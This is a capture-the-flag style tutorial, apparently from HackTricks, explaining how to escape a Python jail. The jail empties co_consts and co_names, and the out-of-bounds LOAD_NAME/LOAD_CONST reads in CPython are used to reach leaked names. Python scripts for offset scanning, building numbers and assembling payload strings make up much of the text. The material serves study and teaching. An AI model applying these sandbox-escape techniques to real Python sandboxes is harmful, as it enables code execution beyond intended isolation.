LOAD_NAME / LOAD_CONST opcode OOB Read
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
This info was taken from this writeup.
We can use the out-of-bounds (OOB) read in the LOAD_NAME / LOAD_CONST opcodes to get symbols that already exist in memory. This means using a trick like (a, b, c, ... hundreds of symbols ..., __getattribute__) if [] else [].__getattribute__(...) to get the symbol (such as a function name) you want.
Then just craft your exploit.
The source code of the challenge is pretty short: it contains only 4 lines!
You can input arbitrary Python code, and it is compiled to a Python code object. However, the co_consts and co_names of that code object are replaced with an empty tuple before the code object is evaluated.
So any expression that contains consts (e.g. numbers, strings) or names (e.g. variables, functions) may end in a segmentation fault.
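The original 4-line source is not reproduced here. As a minimal sketch of a jail with the same shape (compile in eval mode, empty co_consts and co_names, evaluate), the snippet below adds a safety net that the real challenge does not have: the hypothetical helpers jail_compile, indexed_loads and safe_jail_eval refuse to run any code that would index the emptied tuples, so you can experiment without crashing your interpreter. The check is static, so it also flags loads in branches that never run. It assumes CPython 3.9+ (for CodeType.replace and the type hints).

```python
import dis
from types import CodeType


def jail_compile(source: str) -> tuple[CodeType, CodeType]:
    """Hypothetical helper: compile like the challenge, return (original, stripped)."""
    code = compile(source, "<jail>", "eval")
    # Same bytecode, but both lookup tables are now empty tuples.
    return code, code.replace(co_consts=(), co_names=())


def indexed_loads(code: CodeType) -> list[tuple[str, int]]:
    """Hypothetical helper: (opname, raw oparg) of every instruction that
    indexes co_consts or co_names.

    Pass the *original* code object: dis resolves these indexes itself and
    would raise IndexError on the stripped copy."""
    indexed = set(dis.hasconst) | set(dis.hasname)
    return [(i.opname, i.arg) for i in dis.get_instructions(code) if i.opcode in indexed]


def safe_jail_eval(source: str):
    """Hypothetical helper: run the stripped code only if it cannot read past the empty tuples."""
    original, stripped = jail_compile(source)
    hits = indexed_loads(original)
    if hits:
        # In the real challenge these loads would be OOB reads (or a segfault).
        raise ValueError(f"would read out of bounds: {hits}")
    return eval(stripped, {"__builtins__": {}})


print(safe_jail_eval("(not []) + (not [])"))  # 2
```

Calling safe_jail_eval("[a, b, c]") raises ValueError instead of crashing, because that expression needs three LOAD_NAME lookups.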
How does the segfault happen?
Let's start with a simple example: [a, b, c] compiles to bytecode that pushes a, b and c with LOAD_NAME 0, LOAD_NAME 1 and LOAD_NAME 2, and then builds the list with BUILD_LIST 3.
But what if co_names becomes an empty tuple? The LOAD_NAME 2 opcode is still executed and tries to read the value from the memory address where it originally would have been. Yes, this is an out-of-bounds read "feature".
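To see this for yourself, you can compile the expression and compare it with its stripped copy using the standard dis module. The sketch below assumes CPython 3.8+ (for CodeType.replace); the exact dis listing differs between versions, but the LOAD_NAME indexes do not.

```python
import dis

code = compile("[a, b, c]", "<example>", "eval")
stripped = code.replace(co_consts=(), co_names=())

print(code.co_names)      # ('a', 'b', 'c')
print(stripped.co_names)  # ()
dis.dis(code)             # lists LOAD_NAME 0 (a), 1 (b), 2 (c), then BUILD_LIST 3

# The instruction stream is untouched: LOAD_NAME 2 still asks for slot 2,
# but the stripped names tuple has no slot 2 any more.
name_args = [i.arg for i in dis.get_instructions(code) if i.opname == "LOAD_NAME"]
print(stripped.co_code == code.co_code, name_args, len(stripped.co_names))
```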
The core concept of the solution is simple. Some opcodes in CPython, for example LOAD_NAME and LOAD_CONST, are vulnerable (?) to OOB reads.
They retrieve the object at index oparg from the consts or names tuple (that's what co_consts and co_names are called under the hood). In CPython's evaluation loop, LOAD_CONST essentially does value = GETITEM(consts, oparg), takes a new reference to the value and pushes it onto the stack. In release builds GETITEM expands to PyTuple_GET_ITEM, which does not check oparg against the tuple's length.
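CPython's C code is not reproduced here. As a rough illustration only, the toy model below represents memory as one flat Python list and a tuple as a (start, length) window into it; ToyTuple and load_const are hypothetical names, and real memory holds object pointers rather than neatly neighbouring strings. It contrasts checked indexing, which raises IndexError, with the unchecked access described above.

```python
from dataclasses import dataclass


@dataclass
class ToyTuple:
    """Toy model, not CPython code: a tuple as a (start, length) window into a flat heap."""
    heap: list
    start: int
    length: int

    def checked_getitem(self, i: int):
        # Python-level tuple indexing: out-of-range indexes raise IndexError.
        if not 0 <= i < self.length:
            raise IndexError("tuple index out of range")
        return self.heap[self.start + i]

    def unchecked_getitem(self, i: int):
        # Models PyTuple_GET_ITEM in a release build: no comparison with length,
        # so an index past the end returns whatever lies next in the heap.
        return self.heap[self.start + i]


def load_const(consts: ToyTuple, oparg: int):
    # Models value = GETITEM(consts, oparg) followed by a push.
    return consts.unchecked_getitem(oparg)


# Pretend these objects happen to live right after the (now empty) consts tuple.
heap = ["spam", "eggs", "__getattribute__", "__class__"]
empty_consts = ToyTuple(heap, start=0, length=0)  # models co_consts=()

print(load_const(empty_consts, 2))  # __getattribute__
```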
In this way we can use the OOB read to get a "name" from an arbitrary memory offset. To find out which name sits at which offset, just keep trying LOAD_NAME 0, LOAD_NAME 1 ... LOAD_NAME 99 ... and you may find something at around oparg > 700. You could also use gdb to inspect the memory layout, of course, but I don't think that would be any easier.
Once we retrieve those useful offsets for names / consts, how do we get a name / const from that offset and use it? Here is a trick for you:
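Let's assume we can get a __getattribute__ name from offset 5 (LOAD_NAME 5) with co_names=(). Then just evaluate [a, b, c, d, e, __getattribute__] if [] else [[].__getattribute__], and you get the __getattribute__ method of a list object.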
Notice that it is not necessary to name it __getattribute__; you can give it a shorter or weirder name.
The reason becomes clear from the bytecode: LOAD_ATTR also retrieves its name from co_names. Python loads names from the same offset if the name is the same, so the second __getattribute__ is still loaded from offset 5. Using this feature we can use any name, as long as that name is somewhere in nearby memory.
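You can confirm this with dis. The hypothetical helper attr_slots below reports, for each attribute access, which co_names index it uses. With either spelling the attribute access lands on slot 5, which is the slot the OOB read resolves to once co_names is emptied (assuming CPython 3.8+).

```python
import dis


def attr_slots(source: str) -> list[tuple[str, int]]:
    """Hypothetical helper: (attribute name, co_names index) for each attribute load."""
    code = compile(source, "<trick>", "eval")
    return [
        (ins.argval, code.co_names.index(ins.argval))
        for ins in dis.get_instructions(code)
        if ins.opname in ("LOAD_ATTR", "LOAD_METHOD")  # LOAD_METHOD exists up to 3.11
    ]


trick = "[a, b, c, d, e, __getattribute__] if [] else [[].__getattribute__]"
short = "[a, b, c, d, e, x] if [] else [[].x]"  # any placeholder name works

print(attr_slots(trick))  # [('__getattribute__', 5)]
print(attr_slots(short))  # [('x', 5)]
```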
Generating numbers is trivial:
0: not [[]]
1: not []
2: (not []) + (not [])
...
I didn't use consts due to the length limit.
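For longer payloads, a shift-based binary expansion keeps number expressions short. The sketch below is an alternative to the repeated addition shown above, not necessarily what the writeup used; num and touches_tables are hypothetical helpers. touches_tables compiles an expression and reports whether it would index co_consts or co_names, a cheap way to check a payload before sending it.

```python
import dis

ZERO = "(not [[]])"  # [[]] is a non-empty list, so `not` gives False (== 0)
ONE = "(not [])"     # [] is empty, so `not` gives True (== 1)


def num(n: int) -> str:
    """Hypothetical helper: an expression evaluating to n >= 0 without consts or names."""
    if n < 0:
        raise ValueError("only non-negative integers are supported")
    if n == 0:
        return ZERO
    if n == 1:
        return ONE
    # Binary expansion: shifting left by True doubles, adding True sets the low bit.
    doubled = f"({num(n // 2)} << {ONE})"
    return f"({doubled} + {ONE})" if n % 2 else doubled


def touches_tables(expr: str) -> bool:
    """Hypothetical helper: True if the compiled expression indexes co_consts or co_names."""
    indexed = set(dis.hasconst) | set(dis.hasname)
    code = compile(expr, "<num>", "eval")
    return any(ins.opcode in indexed for ins in dis.get_instructions(code))


print(num(5))
print(eval(num(5)), touches_tables(num(5)))  # 5 False
```

Expression length grows with the number of bits of n rather than with n itself, which matters under a length limit.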
First, we need a script to find the offsets of those names.
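The writeup's own script is not reproduced here. Below is a minimal sketch of one way to scan offsets, assuming CPython 3.8+; CHILD, EchoBuiltins, probe_source, probe and scan are hypothetical names. probe_source uses the same if [] else trick so that the only name load actually executed is LOAD_NAME n, and each probe runs in a fresh interpreter so that a segfault only kills the child. EchoBuiltins returns the key it is asked for, so if the OOB slot holds a string, the child prints it.

```python
import subprocess
import sys

# Child program, run in a fresh interpreter per offset (hypothetical helper).
CHILD = r"""
import sys

class EchoBuiltins(dict):
    # Return the looked-up key itself, revealing the object in the OOB slot.
    def __getitem__(self, key):
        return key

code = compile(sys.argv[1], "<probe>", "eval").replace(co_consts=(), co_names=())
print(repr(eval(code, {"__builtins__": EchoBuiltins()})))
"""


def probe_source(n: int) -> str:
    """Source whose only executed name load is LOAD_NAME n.

    x0..xn fill co_names[0..n] in the never-taken branch; the else branch
    then loads xn, which reuses index n."""
    names = ", ".join(f"x{i}" for i in range(n + 1))
    return f"({names}) if [] else x{n}"


def probe(n: int, timeout: float = 5.0):
    """Return the repr printed for OOB name slot n, or None on crash, error or timeout."""
    try:
        proc = subprocess.run(
            [sys.executable, "-c", CHILD, probe_source(n)],
            capture_output=True, text=True, timeout=timeout,
        )
    except subprocess.TimeoutExpired:
        return None
    return proc.stdout.strip() if proc.returncode == 0 else None


def scan(limit: int):
    """Yield (offset, repr) for every slot below limit whose probe did not fail."""
    for n in range(limit):
        found = probe(n)
        if found is not None:
            yield n, found
```

For example, run for offset, value in scan(1000): print(offset, value). Offsets found this way are only meaningful for the same CPython build, and they may shift if the target process is started differently, so treat them as candidates to verify against the target.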
Then comes a script that generates the real Python exploit.
It basically assembles the exploit, and every string it needs is taken from the list returned by the __dir__ method.
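As a minimal sketch of that idea, assuming the generator runs on the same CPython version as the target (the order of [].__dir__() is not guaranteed across versions), the hypothetical helper dir_string below turns a wanted attribute name into an index into [].__dir__(), using repeated-addition numbers like the ones listed earlier. In the real payload the __dir__ attribute name itself has to come from an OOB name slot; here the expression is evaluated normally only to check the index arithmetic.

```python
ZERO = "(not [[]])"
ONE = "(not [])"


def small_num(n: int) -> str:
    """Hypothetical helper: n as repeated (not []) additions."""
    return "+".join([ONE] * n) if n > 0 else ZERO


def dir_string(wanted: str) -> str:
    """Hypothetical helper: an expression that yields `wanted` from [].__dir__().

    The index is computed in *this* interpreter, so the generator must run on
    the same CPython version as the target for the index to match."""
    index = [].__dir__().index(wanted)  # raises ValueError if the name is absent
    return f"[].__dir__()[{small_num(index)}]"


expr = dir_string("__class__")
print(eval(expr))  # __class__
```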